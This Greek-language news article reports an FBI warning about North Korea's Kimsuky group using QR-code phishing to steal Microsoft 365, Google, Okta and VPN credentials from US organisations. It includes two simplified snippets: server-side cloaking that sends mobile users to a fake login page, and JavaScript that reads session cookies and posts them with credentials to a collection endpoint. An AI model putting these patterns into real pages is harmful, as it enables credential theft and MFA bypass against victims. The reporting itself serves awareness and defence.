Παρασκευή, 9 Ιανουαρίου, 2026
Google search engine
ΑρχικήSecurityΤο FBI προειδοποιεί ότι οι ηθοποιοί Kimsuky χρησιμοποιούν κακόβουλους κωδικούς QR για...

Το FBI προειδοποιεί ότι οι ηθοποιοί Kimsuky χρησιμοποιούν κακόβουλους κωδικούς QR για να στοχεύσουν οργανισμούς των ΗΠΑ


Η ομάδα Kimsuky που χρηματοδοτείται από το κράτος της Βόρειας Κορέας διεξάγει νέες εκστρατείες spearphishing που κάνουν κατάχρηση κωδικών QR για να παραβιάσουν οργανισμούς των ΗΠΑ.

Το FBI προειδοποιεί ότι δεξαμενές σκέψης, ΜΚΟ, ακαδημαϊκοί φορείς και οντότητες που συνδέονται με την κυβέρνηση με επίκεντρο τη Βόρεια Κορέα δελεάζονται τώρα με email “Quishing” που κρύβουν κακόβουλες διευθύνσεις URL πίσω από εικόνες QR αντί για συνδέσμους με δυνατότητα κλικ.

Η στροφή σε κωδικούς QR βοηθά τους παράγοντες της απειλής να μετακινήσουν τα θύματα από προστατευμένα εταιρικά τελικά σημεία και σε λιγότερο ελεγχόμενες κινητές συσκευές.

Σε αυτές τις εκστρατείες, οι χειριστές της Kimsuky παραπλανούν αξιόπιστες επαφές, όπως ξένους συμβούλους, προσωπικό πρεσβειών ή συναδέλφους ερευνητές. Τα μηνύματα ηλεκτρονικού ταχυδρομείου καλούν τους στόχους να σαρώσουν έναν κωδικό QR για να συμμετάσχουν σε μια διάσκεψη, να ανοίξουν μια “ασφαλή” μονάδα δίσκου ή να απαντήσουν σε μια έρευνα πολιτικής.

Αφού σαρωθεί, ο κώδικας ανακατευθύνει σιωπηλά τον χρήστη μέσω υποδομής που ελέγχεται από τους εισβολείς που λαμβάνει δακτυλικά αποτυπώματα στη συσκευή και στη συνέχεια φορτώνει μια ψεύτικη πύλη σύνδεσης για υπηρεσίες όπως το Microsoft 365, το Google, το Okta ή οι πύλες VPN.

Αφού εξέτασαν τις πρόσφατες υποβολές, οι αναλυτές του IC3 αναγνωρισθείς ότι οι αλυσίδες QR είναι ρυθμισμένες ώστε να αποφεύγουν την κανονική ασφάλεια email και τους ελέγχους MFA ενώ συγκεντρώνουν αθόρυβα τα διαπιστευτήρια και τα διακριτικά περιόδου λειτουργίας προγράμματος περιήγησης.

Αυτές οι λειτουργίες συχνά τελειώνουν με πλήρη ανάληψη λογαριασμού, κατάχρηση γραμματοκιβωτίου και μακροπρόθεσμη πρόσβαση σε πόρους cloud σε όλο το δίκτυο των θυμάτων.

Μια πιο προσεκτική ματιά στη διαδρομή μόλυνσης δείχνει ότι οι κωδικοί QR κατευθύνονται πρώτα σε τομείς που καταγράφουν βασικά χαρακτηριστικά, όπως παράγοντας χρήστη, τύπος λειτουργικού συστήματος, διεύθυνση IP, γλώσσα και μέγεθος οθόνης.

Στη συνέχεια, η λογική από την πλευρά του διακομιστή αποφασίζει εάν θα εμφανιστεί μια σελίδα phishing βελτιστοποιημένης για κινητά ή θα απομακρυνθεί το θύμα εάν το προφίλ μοιάζει με σαρωτή ή sandbox. Στον κώδικα, ένα απλοποιημένο μπλοκ απόφασης στον διακομιστή μπορεί να μοιάζει με:-

if "Android" in ua or "iPhone" in ua:
    redirect("/m365/login/mobile")
else:
    redirect("/news/article")

Μόλις το θύμα προσγειωθεί στην ψεύτικη σελίδα και εισαγάγει τον κωδικό πρόσβασής του και τον κωδικό μιας χρήσης, τα σενάρια Kimsuky αρπάζουν τόσο τα διαπιστευτήρια όσο και τυχόν cookie περιόδου σύνδεσης που συνδέονται με τη ροή σύνδεσης. Ένα βασικό μοτίβο JavaScript μπορεί να είναι:

const token = document.cookie;
fetch("/collect", {
  method: "POST",
  body: JSON.stringify({ creds, token })
});

Με την επανάληψη αυτών των διακριτικών, οι ηθοποιοί παρακάμπτουν το MFA και δημιουργούν ή τροποποιούν κανόνες πρόσβασης, προωθητές και κωδικούς πρόσβασης εφαρμογών εντός του λογαριασμού.

Από εκεί, στέλνουν φρέσκα θέλγητρα που βασίζονται σε QR από το παραβιασμένο γραμματοκιβώτιο, κάνοντας κάθε νέο κύμα να φαίνεται ακόμα πιο αξιόπιστο και διατηρώντας τη θέση τους ενεργή για εκτεταμένες περιόδους.



VIA: cybersecuritynews.com

Marizas Dimitris
Marizas Dimitrishttps://techreport.gr
Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες. Λατρεύει να εξερευνά νέες ιδέες, να επιλύει σύνθετα προβλήματα και να βρίσκει τρόπους ώστε η τεχνολογία να γίνεται πιο ανθρώπινη, απολαυστική και προσιτή για όλους. Στον ελεύθερο χρόνο του ασχολείται με το σκάκι και το poker, απολαμβάνοντας την στρατηγική και τη δημιουργική σκέψη που απαιτούν.
RELATED ARTICLES

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

εισάγετε το σχόλιό σας!
παρακαλώ εισάγετε το όνομά σας εδώ

- Advertisment -
Google search engine

Most Popular

Recent Comments